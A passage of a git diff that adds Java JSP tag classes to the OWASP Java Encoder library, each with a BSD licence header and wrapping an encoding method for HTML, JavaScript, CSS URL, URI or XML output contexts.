provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform CSS encoding for CSS URL contexts. + * This wraps the {@link org.owasp.encoder.Encode#forCssUrl(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCssUrlTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forCssUrl(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java new file mode 100644 index 0000000..866b933 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML encoding for HTML text attributes. + * This wraps the {@link org.owasp.encoder.Encode#forHtmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtmlAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java new file mode 100644 index 0000000..9ebf3c7 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlContentTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML encoding for text content. + * This wraps the {@link org.owasp.encoder.Encode#forHtmlContent(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlContentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtmlContent(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java new file mode 100644 index 0000000..71c7d73 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML encoding. + * This wraps the {@link org.owasp.encoder.Encode#forHtml(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtml(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java new file mode 100644 index 0000000..5b895f9 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForHtmlUnquotedAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform HTML Attribute encoding for an unquoted attribute. + * This wraps the {@link org.owasp.encoder.Encode#forHtmlUnquotedAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForHtmlUnquotedAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forHtmlUnquotedAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java new file mode 100644 index 0000000..71ff6b6 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript Attribute encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScriptAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java new file mode 100644 index 0000000..439f963 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptBlockTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript Block encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptBlock(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptBlockTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScriptBlock(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java new file mode 100644 index 0000000..4b6b3b1 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptSourceTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript Source encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScriptSource(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptSourceTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScriptSource(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java new file mode 100644 index 0000000..c3edc17 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForJavaScriptTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform JavaScript encoding. + * This wraps the {@link org.owasp.encoder.Encode#forJavaScript(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForJavaScriptTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forJavaScript(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java new file mode 100644 index 0000000..ab1552e --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriComponentTag.java @@ -0,0 +1,53 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag that performs percent-encoding for a component of a URI, such as a query + * parameter name or value, path, or query-string. + * This wraps the {@link org.owasp.encoder.Encode#forUriComponent(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriComponentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forUriComponent(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java new file mode 100644 index 0000000..9b975f5 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForUriTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform percent-encoding of a URL according to RFC 3986. + * This wraps the {@link org.owasp.encoder.Encode#forUri(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForUriTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forUri(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java new file mode 100644 index 0000000..e2820d9 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlAttributeTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Attribute Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlAttributeTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXmlAttribute(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java new file mode 100644 index 0000000..fd3e0d5 --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlCommentTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import 